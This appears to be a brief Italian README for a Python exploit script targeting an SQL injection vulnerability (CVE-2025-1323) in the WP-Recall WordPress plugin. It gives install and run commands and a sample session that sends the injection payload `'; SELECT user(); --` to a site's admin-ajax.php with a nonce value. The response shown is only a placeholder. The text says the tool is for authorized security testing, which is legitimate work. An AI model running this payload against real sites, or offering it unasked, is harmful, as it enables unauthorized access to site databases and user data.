
WP-Recall Plugin Iniezione SQL
Iniezione SQL nel plugin WP-Recall
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e uso educativo.
Non utilizzare su sistemi senza autorizzazione esplicita. L'uso improprio potrebbe essere illegale.
requestsInstalla le dipendenze:
pip install requests
python CVE-2025-1323.py
Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06
[*] Invio del payload: '; SELECT user(); --
[+] Risposta ricevuta:
{"result":"SQL error or leaked data here..."}